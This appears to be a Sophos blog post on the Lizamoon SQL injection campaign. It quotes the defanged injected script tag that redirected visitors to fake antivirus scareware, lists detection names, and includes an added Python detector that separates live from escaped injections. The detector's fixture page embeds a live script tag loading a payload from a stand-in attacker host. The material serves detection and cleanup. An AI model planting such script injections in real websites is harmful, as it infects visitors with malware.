What's the deal with the Lizamoon SQL injection?

Filed Under: Malware, SophosLabs

There has been a great deal of press in the last few days about Lizamoon. The following script element was injected into a large number of websites:

<script src=hxxp://lizamoon . com / ur . php >

At the time of writing, various other domains are being used, not just lizamoon.

The script loaded from the compromised web pages redirects the user to a malicious site. Ultimately, the attack is intended to infect users with fake AV (scareware). The distribution sites typically use the ".cc" (Cocos Islands) or ".in" (India) TLDs.

Sophos Perspective

SophosLabs have been monitoring these attacks and have protected customers in several ways:

  • detecting the fake AV pages as Mal/FakeAVJS-A
  • detecting the fake AV payload as Mal/FakeAV-IP
  • blocking access to the known sites used in this attack with URL filtering at the endpoint and web gateway

Additionally, detection for web pages injected with the malicious script element has been released today as Troj/Badsrc-L.

Current scope of the problem

If you do a Google search for:

"<script src=http://*/ur.php"

you get a large number of hits.

This frightening volume may be a little misleading, since the total is inflated by occurrences of the following HTML within the compromised web pages:

&lt;script src=hxxp://lizamoon . com / ur . php &gt;

As you can see, in some cases the injected code has been HTML-entity escaped, so the browser displays it as text rather than creating a script element, rendering that particular injection harmless (though it still matches the search string above).
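To see why the search count overstates the number of live infections, here is an added example (not code from the original post or from Sophos) that runs two pages through Python's standard-library HTML parser: a real script element arrives at the parser as a start tag with a src attribute, while the entity-escaped copy is decoded and delivered as ordinary text, which is also how a browser treats it. Both sample pages and the host attacker.example are constructed for the demo; the marker path /ur.php is the one from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample pages for the demo; attacker.example stands in for the
# real distribution domains and is not taken from the original post.
LIVE_PAGE = """<html><body>
<h1>Latest news</h1>
<script src=http://attacker.example/ur.php></script>
</body></html>"""

ESCAPED_PAGE = """<html><body>
<h1>Latest news</h1>
<p>&lt;script src=http://attacker.example/ur.php&gt;&lt;/script&gt;</p>
</body></html>"""


class InjectedScriptFinder(HTMLParser):
    """Separate live <script src=.../ur.php> elements from escaped copies.

    The parser only calls handle_starttag for real markup. Entity-escaped
    markup (&lt;script ...&gt;) is decoded and handed to handle_data as text,
    so it can never become a script element.
    """

    def __init__(self, marker_path):
        # convert_charrefs=True (the default) decodes &lt; &gt; etc. before handle_data
        super().__init__()
        self.marker_path = marker_path
        self.live = []      # src URLs of real script elements that load the marker
        self.escaped = []   # text nodes that merely contain the marker

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src") or ""   # attribute value may be None
        if urlsplit(src).path == self.marker_path:
            self.live.append(src)

    def handle_data(self, data):
        if self.marker_path in data:
            self.escaped.append(data.strip())


def scan(html, marker_path="/ur.php"):
    """Return the live and escaped occurrences of marker_path in one page."""
    finder = InjectedScriptFinder(marker_path)
    finder.feed(html)
    finder.close()
    return {"live": finder.live, "escaped": finder.escaped}


def classify(html, marker_path="/ur.php"):
    """'live' if the page would load the script, 'escaped' if it only shows the text, else 'clean'."""
    result = scan(html, marker_path)
    if result["live"]:
        return "live"
    if result["escaped"]:
        return "escaped"
    return "clean"


if __name__ == "__main__":
    for name, page in (("live", LIVE_PAGE), ("escaped", ESCAPED_PAGE)):
        print(name, classify(page), scan(page))
```

Running scan over a crawl of your own pages gives two lists instead of one hit count: the "live" list is what needs cleaning up at the database layer, while the "escaped" list is inert but still tells you which content was touched by the injection.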


About the author

Paul O Baccas (aka pob) joined Sophos in 1997 after studying Engineering Science at Oxford University. After nearly 16 years, he has left Sophos to pastures new and will be writing as an independent malware researcher. Paul has: published several papers, presented at several Virus Bulletins and was a technical editor for "AVIEN Malware Defense Guide". He has contributed to Virus Bulletin and is a frequent contributor to the NakedSecurity blog.